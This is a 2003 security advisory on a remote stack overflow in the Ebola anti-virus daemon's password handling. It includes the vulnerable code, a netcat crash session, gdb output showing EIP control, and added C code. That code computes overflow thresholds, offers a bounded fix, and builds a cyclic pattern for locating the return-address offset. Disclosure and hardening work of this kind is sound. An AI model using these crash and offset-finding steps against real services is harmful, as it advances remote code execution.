[UNIX] PLDaniels Ebola Remote Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 12/07/03

    To: list@securiteam.com
    Date: 7 Dec 2003 17:14:03 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      PLDaniels Ebola Remote Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://pldaniels.com/ebola/> Ebola is an anti-virus scanning daemon that
    considerably improves the performance of scanning systems such as AMaViS,
    Inflex and other programs that require on-demand scanning from various AV
    engines. The Ebola daemon contains a remotely exploitable stack-based buffer
    overflow in its authentication sequence.

    DETAILS

    Immune systems:
     * Ebola version 0.1.5

    Vulnerable systems:
     * Ebola version 0.1.4 and prior

    This issue is caused by the handle_PASS() function in ebola.c, which uses an
    unbounded sprintf() to copy the attacker-supplied username and password into
    a fixed 100-byte stack buffer:

    char outstr[100];
    ..
    if (passwd) {
       if (PASS_authenticate(username, passwd) == _PASS_OK) {
          sprintf(outstr,"PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n",username,passwd);
    ..

    Exploiting this issue is fairly simple: by providing an overly long password
    (or username) you overflow the 100-byte buffer and overwrite the saved
    return address, so EIP is under the attacker's control when handle_PASS()
    returns.
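    The following C is an added example written for this page; it is not code from
    Ebola or from the advisory. It reuses the format string and the 100-byte
    buffer size from the excerpt above (assumed to be quoted verbatim) to compute
    exactly how long a password has to be before the original sprintf() overruns
    outstr, and shows a bounded replacement that reports truncation and does not
    echo the submitted password at all. Function names and the test inputs are the
    example's own.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Size of the fixed stack buffer in the advisory's excerpt: char outstr[100]. */
#define OUTSTR_SIZE 100

/* Format string as it appears in the excerpt (assumed to be quoted verbatim). */
static const char REJECT_FMT[] =
    "PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n";

/* Bytes the original sprintf() would store in outstr, terminating NUL included.
 * snprintf(NULL, 0, ...) only measures the result; nothing is written. */
size_t reject_len(const char *user, const char *pass)
{
    int n = snprintf(NULL, 0, REJECT_FMT, user, pass);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* True when the original unbounded sprintf() into outstr[100] would overrun it. */
bool reject_overflows(const char *user, const char *pass)
{
    return reject_len(user, pass) > OUTSTR_SIZE;
}

/* Shortest password that overflows for a given username. The advisory just
 * sends a long run of 'A's; this computes the exact threshold instead. */
size_t min_overflowing_pass_len(const char *user)
{
    size_t fixed = reject_len(user, "");        /* everything except the password */
    return fixed >= OUTSTR_SIZE ? 0 : OUTSTR_SIZE - fixed + 1;
}

/* Convenience for experiments: does a password of plen 'A's overflow? */
bool overflows_with_pass_len(const char *user, size_t plen)
{
    char pass[256];
    if (plen >= sizeof pass)
        return true;                             /* far beyond the 100-byte buffer */
    memset(pass, 'A', plen);
    pass[plen] = '\0';
    return reject_overflows(user, pass);
}

/* Hardened replacement: bounded write, truncation reported to the caller, and
 * the submitted password is never echoed back into a reply or a log line.
 * Returns 0 on success, 1 if the message had to be truncated, -1 on error. */
int reject_safe(char *out, size_t outsz, const char *user)
{
    int n = snprintf(out, outsz, "PASS NOT ACCEPTED for user \"%s\".\n", user);
    if (n < 0)
        return -1;
    return (size_t)n >= outsz ? 1 : 0;
}

/* Wrapper used for checking: formats into a local outsz-byte window. */
int reject_safe_status(const char *user, size_t outsz)
{
    char out[OUTSTR_SIZE];
    if (outsz > sizeof out)
        outsz = sizeof out;
    return reject_safe(out, outsz, user);
}

int main(void)
{
    const char *user = "ZZZZXXX";                /* username from the advisory session */
    printf("fixed part with user \"%s\": %zu bytes\n", user, reject_len(user, ""));
    printf("shortest overflowing password: %zu bytes\n", min_overflowing_pass_len(user));
    char out[OUTSTR_SIZE];
    printf("hardened reply status: %d\n", reject_safe(out, sizeof out, user));
    fputs(out, stdout);
    return 0;
}
```

    With the seven-character username from the session, the fixed text plus NUL
    already occupies 48 of the 100 bytes, so any password of 53 bytes or more
    writes past the end of outstr; the bounded version can never do so, whatever
    the input length.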

    bash-2.05b$ nc localhost 1665
    Welcome to Ebola v0.1.4
    user ZZZZXXX
    USER name received, please send PASS
    pass AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ABCD
    PASS NOT ACCEPTED for user "ZZZZXXX", pass "AAAAAAAAAAA...

    A quick look in gdb confirms that this is a vanilla stack overflow: the
    trailing "ABCD" of the password ends up in EIP as 0x44434241 (the bytes
    'A','B','C','D' read as a little-endian word), and the saved ebx, ebp, esi
    and edi are all 0x41414141.

    [root@RiotStarter root]# gdb ebola 10440
    Attaching to process 10440
    Reading symbols from /home/dotslash/ebola-0.1.4/ebola...
    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x44434241 in ?? ()

    (gdb) i r
    eax 0x0 0
    ecx 0xbffba7c4 -1074026556
    edx 0x0 0
    ebx 0x41414141 1094795585
    esp 0xbffbaa10 0xbffbaa10
    ebp 0x41414141 0x41414141
    esi 0x41414141 1094795585
    edi 0x41414141 1094795585
    eip 0x44434241 0x44434241

    The master ebola process never dies: it forks a child for every connection
    and keeps spawning children no matter how many of them you crash. Because of
    this you can brute force both the distance to the saved EIP and the address
    used for the shellcode without ever taking the service down.
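    Brute forcing the distance to EIP is unnecessary when the crash value is
    visible in gdb, as it is above. The following C is an added example written
    for this page, not code from the advisory or from Ebola: it builds a cyclic
    pattern in the Metasploit pattern_create style, translates a crash EIP back
    into the offset of the saved return address, and reproduces the advisory's
    own marker trick (a run of 'A's ending in "BCD", which puts 0x44434241 in
    EIP). Function names and the sample offsets are the example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Cyclic pattern "Aa0Aa1Aa2...Zz9": the Metasploit pattern_create layout, which is
 * relied on to give unique 4-byte windows over its full 20280 bytes, so whatever
 * lands in EIP identifies its own position. Returns the number of bytes written. */
size_t pattern_create(char *buf, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { (char)u, (char)l, (char)d };
                for (int k = 0; k < 3 && n < len; k++)
                    buf[n++] = trip[k];
            }
    return n;
}

/* Locate the crash EIP inside the pattern. x86 is little-endian, so a register
 * value 0x44434241 corresponds to the bytes 'A','B','C','D' in memory order.
 * Returns the offset of the first match, or -1 if the value is not from the pattern. */
long pattern_offset(const char *pat, size_t len, uint32_t eip)
{
    unsigned char needle[4] = {
        (unsigned char)(eip & 0xff),         (unsigned char)((eip >> 8) & 0xff),
        (unsigned char)((eip >> 16) & 0xff), (unsigned char)((eip >> 24) & 0xff) };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* The advisory's marker: run_of_a 'A's followed by "BCD". With EIP = 0x44434241
 * the saved return address starts at the last 'A', i.e. offset run_of_a - 1. */
long offset_from_marker_run(size_t run_of_a)
{
    char pass[512];
    if (run_of_a + 4 > sizeof pass)
        return -1;
    memset(pass, 'A', run_of_a);
    memcpy(pass + run_of_a, "BCD", 3);
    return pattern_offset(pass, run_of_a + 3, 0x44434241u);
}

/* Self-check: build a pattern, take the 4 bytes at `want` as if they had been
 * read out of EIP after a crash, and confirm the lookup recovers that offset. */
long pattern_roundtrip(size_t pattern_len, size_t want)
{
    char pat[1024];
    if (pattern_len > sizeof pat || want + 4 > pattern_len)
        return -1;
    pattern_create(pat, pattern_len);
    uint32_t eip = (uint32_t)(unsigned char)pat[want]
                 | (uint32_t)(unsigned char)pat[want + 1] << 8
                 | (uint32_t)(unsigned char)pat[want + 2] << 16
                 | (uint32_t)(unsigned char)pat[want + 3] << 24;
    return pattern_offset(pat, pattern_len, eip);
}

int main(void)
{
    char pat[200];
    size_t n = pattern_create(pat, sizeof pat);
    printf("pattern (%zu bytes): %.24s...\n", n, pat);
    /* Pretend the crash showed the word stored at offset 112. */
    printf("offset for sample crash EIP: %ld\n", pattern_roundtrip(n, 112));
    printf("advisory marker, 57 x 'A' + \"BCD\": offset %ld\n", offset_from_marker_run(57));
    return 0;
}
```

    Send the pattern as the PASS argument instead of a run of 'A's, read EIP from
    the SIGSEGV in gdb, and pattern_offset() gives the exact number of bytes that
    precede the saved return address; the 100-byte buffer then only needs one
    crash, not a brute-force loop.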

    Vendor Status:
    Paul L Daniels responded to this issue promptly; a patch was available
    immediately after it was reported.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dotslash@snosoft.com> KF.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

